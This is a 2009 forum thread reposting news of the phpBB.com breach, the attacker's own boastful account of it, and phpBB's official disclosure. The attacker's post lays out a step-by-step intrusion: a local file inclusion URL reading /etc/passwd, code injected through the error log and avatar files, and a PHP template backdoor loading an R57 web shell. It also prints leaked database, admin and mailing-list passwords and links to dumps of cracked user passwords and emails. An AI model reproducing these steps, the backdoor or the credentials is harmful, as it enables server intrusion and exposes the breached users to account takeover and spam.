Log in Register FAQ Memberlist Search Welcome to RCF - WHF Forum Index
alt : test.swf
Welcome to RCF - WHF
4fx3.gif 
Contact the Webmasters of RCFContact   Invite a friend to Join usRecommend   Chat in IRCChat   EZ Template Change OptionEZStyle   Listen to Internet Radio while you browse...iRadio   See your private message.Login for PMs   Important LinksLinks
Member Website LinksWeb Links   Play/View our GamesGames   Register.Register
calendar_open_closeCalendar 
phpBB.com hacked...
Post new topic   Reply to topic View previous topic :: View next topic
Welcome to RCF - WHF Forum Index -> Area 51 - phpBB & Easymod Tech Support Add To Bookmarks
phpBB.com hacked...
PostPosted: 02/09/2009 4:21 PM Reply with quote
Site Admin
Nightrider
Site Admin
Posts 30756
Word Cnt. 2,628,678
BDay Jul 28
Sign Leo
Sex Sex:Male
Joined: Sep 25, 2004
Local time: 6:33 AM
Location: St Pete, FL
peace.gif


phpBB.com hacked; Details scarce

One of the most widely used open-source bulletin board system in the world has been attacked by malicious hackers.

According to a brief “maintenance” notice posted on the phpbb.com home page (screenshot above), the attack occurred through a vulnerability in an outdated PHPList installation.

No other details were offered.   On the bright side, the phpBB maintainers said no vulnerabilities were found in the phpBB software itself.

More...

munky2
Back to Top
View all pictures posted by this userView user's profile Find all posts by Nightrider Send private message   AIM Address Yahoo Messenger Phoogle Map ICQ Number
Re: phpBB.com hacked...
PostPosted: 02/09/2009 4:23 PM Reply with quote
Site Admin
Nightrider
Site Admin
Posts 30756
Word Cnt. 2,628,678
BDay Jul 28
Sign Leo
Sex Sex:Male
Joined: Sep 25, 2004
Local time: 6:33 AM
Location: St Pete, FL
peace.gif
I hacked PHPBB.com

It all started on Jan 14th when I was surfing milw0rm and came across this exploit: http://www.milw0rm.com/exploits/7778 I then remembered that phpbb.com was running PHPlist and went looking through my email to find the link to the script’s location. So I went to phpbb.com/lists and sure enough they were running a vulnerable version. Next I enabled my favorite program proxy program and tried http://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../ ../../../../../etc/passwd and sure enough it included the etc/passwd

http://hackedphpbb.pastebin.com/f70f8bcaf
http://rapidshare.com/files/192159914/etc.txt

So I moved on to /etc/httpd/conf/httpd.conf
http://rapidshare.com/files/192163061/httpd.txt
http://hackedphpbb.pastebin.com/d29d8d4c7

And eventually found my way to their error log /home/logs/phpbb.com/error_log. After a little looking I figured out that their forums were running off /home/virtual/phpbb.com/community/ well it has been known for some time that you can include code in the error log. So I wanted to run some code, well in PHPBB3 the avatars are located in a folder called /home/virtual/phpbb.com/community/images/avatars/upload and your avatar is called (secret hash)_userid.jpg. But I didn’t know what the secret has was to include my picture (that had my own code in it) so by using the error log I injected code
And figured out that their hash is f51ee61fe7a83fdf72780912bced0855. So now every time I want to upload run code against the server I can include this: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upl oad/f51ee61fe7a83fdf72780912bced0855_ID.jpg

So my first avatar was something simple and I wanted to see if phpbb kept their config file in plain text so cat /home/virtual/phpbb.com/community/config.php and sure enough, its in plain text.
$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5';
$table_prefix = 'community_';

While I was at it I checked out the config for PHPlist and it was also in plain text:
$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3';

So I started running commands and found out that I can upload a php text file on the forums and by finding where the path it was stored I was able to get around their 14kb restrictions on avatars and a lot easier than editing images with edjpgcom. So doing a mysql dump of the phplist_admin table it showed in plain text that the password for the one admin account was phpbb_n3ws and the login was phpBB. Wow I am shocked no one brute forced this. So I login and see what I can come across, wow 400,000 registered emails, I’m sure that will go quick on the black market, sorry people but expect a lot of spam. After trying to modify the files that were stored in PHPlist I gave up and moved on to the forums. But not before dumping the PHPlist emails here: http://rapidshare.com/files/192305758/out.txt

On the phpbb forums it states it has 200,000 members, but due to them constantly getting spammed they have well over 400,000 accounts. I started dumping the community_users table with their user_id, username and user_password. PHPBB stores their user’s passwords in unsalted md5 and their admin’s passwords in some funky hash. But if you run your own forum and are an admin you can have your forums create the hash, and then you do an mysql update to one of the admin account’s and your in. Or if you change their password to yours you can use the recover password function. More to come from this later.

So I wrote a script that submits via curl, the md5 hash to a website and then stores the successful result in my own mysql database. The total accounts cracked are: 28635. I could have continued cracking but it was getting boring. Here is a sql file of the cracked passwords. Warning, some of the user name’s aren’t right as I had to remove ticks and quotes for it to run in my script, so I included their user id so you can check their proper login name.
http://rapidshare.com/files/192304153/phpbb_users.sql

In gaining access to the admin panel of the forums, I was able to read staff forums and come across some interesting posts. I will share some with you.

List passwords:
TO try and make this easier, below is a list of the mailing list passwords I had, please update and add any others that you have

54a946c47dd434b2
6f543db8f086e11f
c192b68baacc8842
f85ffcdf9262420c
5db5bf75be85191b
7c843188ed2f6021
533aeefe56bfa30c
859785a9cc724e03
3c79b9864ae5ce43
7e9563750650e4c4
534d4a9b74bb77aa
8f318ffd3a2067c8
81657892dddafdca
85c837b7f78e5435

Told you they were random Meik Wink

edit by dhn: added website-commits
edit by tm: added phpbb-honey-commits, st--tool-commits, iit-track-commits.

8kg;rt7Xykjq

That password should work for all mailing lists on code.phpbb.com.

Emergency contacts and irc info:
http://hackedphpbb.pastebin.com/f1399b3e8

And then I remembered that the admin panel allows you to dump tables. So I dumped the users table which is accessible here:
http://rapidshare.com/files/192261517/backup_sql.gz

Next I enabled php in template files and added this bit of code to one of the templates:
$ip=$_SERVER['REMOTE_ADDR']; if($ip == "x.x.x.x"){include("/home/virtual/phpbb.com/community/files/(myid)_82e c9f9eb80df2a16cc3638429631c9f");}

Which happened to be a shell, R57shell actually. I then searched for a writable directory and created a php file and wrote the source code to that file. I cleaned up the template and settings and logs and left the forums to run the way they were.

After searching around using the shell I came across the Blog settings:
define('DB_NAME', 'wordpress'); // The name of the database
define('DB_USER', 'blog'); // Your MySQL username
define('DB_PASSWORD', 'htsCCvyCnt5jPYMx'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

And now it comes to an end, you may ask why did I do this? For fun mainly, but what I would like to suggest to the team at phpbb is this. If you are going to run third party scripts, either integrate them or keep up to date on their patches. (even though the patch wasn’t released for 2 weeks). Also don’t allow admin’s to recover their passwords, they should have to contact another admin. Another item, doesn’t keep plain text files of passwords or in the database plain text passwords.

I know this isn’t the best read, but it is very hard to look back on everything you did over the course of a few weeks. But hopefully I can now sleep better knowing that I am not worrying about the next way to break in.

-----------------------------------UPDATE
to all that say i am a script kiddie, fuck you
phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog
--------------------------update
here are some updated links
http://www.2shared.com/file/4785295/67200bd7/phpbb.html

when i was talking about encrypted passwords, i ment when it was stored in PHPlist in plain text

More...

munky2
Back to Top
View all pictures posted by this userView user's profile Find all posts by Nightrider Send private message   AIM Address Yahoo Messenger Phoogle Map ICQ Number
Re: phpBB.com hacked...
PostPosted: 02/09/2009 4:29 PM Reply with quote
Site Admin
Nightrider
Site Admin
Posts 30756
Word Cnt. 2,628,678
BDay Jul 28
Sign Leo
Sex Sex:Male
Joined: Sep 25, 2004
Local time: 6:33 AM
Location: St Pete, FL
peace.gif
Downtime and Server Compromise

As you may already be aware from the message on phpBB.com or the topic in the #phpBB channel on Freenode, we have recently been attacked via a vulnerability in an outdated PHPList installation. The initial attack was performed well before a new version of the software was released or a patch provided. It is important to stress that no vulnerabilities have been found in the phpBB software itself.

We took area51.phpBB.com down along with phpBB.com to ensure integrity and prevent further damage. While we actively work to bring phpBB.com back online, we would also like to inform you of the damage that has been done.

The attacker gained entry through the PHPList application and was able to dump a complete backup of the emails on file. He then used the same exploit to access the phpBB.com database. Both the email list from PHPlist and a copy of the phpBB.com users table were then posted publicly.

phpBB3 uses a complex hashing algorithm in order to prevent someone from determining the plaintext value of a password. phpBB2, however, used a much simpler and less secure md5 algorithm to store passwords. This is one of the many reasons why we have decided to no longer support the phpBB2 software. Because hashes cannot be reversed, phpBB3 is set to convert phpBB2 hashes to the new phpBB3 standard during the first user login. Those users who registered while phpBB.com used phpBB2 and did not login on the new phpBB3 board continue to have their password hashes stored in the old format. Passwords stored in the old format are much less secure than those stored in the new format. The attackers have been focusing purely on the passwords stored in the old format.

If the password to your phpBB.com account is used anywhere else (especially with the same username), we strongly recommend that you change it. Using the same password across multiple sites is not security wise and should not be done under any circumstance. Additionally, you should change your password on phpBB.com, when it becomes available.

We apologise for not securing our servers in time to prevent this from happening. This demonstrates how critically important it is to always make sure that you keep up to date with any software that is running on your machine. Intrusion is possible even before a patch is provided to fix a vulnerability. At this time, the team is working around the clock to restore phpBB.com and other resources.

Press Contact: If you need to get in contact with the management, please email phpbb_press (at) marshalrusty (dot) com.

Thank you,

- The phpBB Teams

You may discuss this announcement here: viewtopic.php?f=3&t=29974

munky2
Back to Top
View all pictures posted by this userView user's profile Find all posts by Nightrider Send private message   AIM Address Yahoo Messenger Phoogle Map ICQ Number
Re: phpBB.com hacked...
PostPosted: 02/09/2009 6:28 PM Reply with quote
Citation
fishead
Citation
Posts 4813
Word Cnt. 427,864
BDay Oct 23
Sign Scorpio
Sex Sex:Male
Joined: Feb 09, 2005
Local time: 6:33 PM
Location: Sterling IL
usaCa.gif
friggen script kiddie anyway. I hope he gets a life when he grows up and someone destroys it.
Back to Top
View all pictures posted by this userView user's profile Find all posts by fishead Send private message   Visit poster's website Phoogle Map Visit poster's Blog
 Post new topic  Reply to topic
Information
Welcome to RCF - WHF Forum Index -> Area 51 - phpBB & Easymod Tech Support

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum
All times are GMT - 5 Hours

Page 1 of 1


Add To Bookmarks

 
  
  


  Google

Powered by phpBB © 2001, 2005 phpBB Group
  ImageShack  
  Putfile  
  TinyURL  
  CommonDreams  
  Log in  

Page generation time: 0.1895s (PHP: 82% - SQL: 18%) - SQL queries: 43 - GZIP enabled - Debug on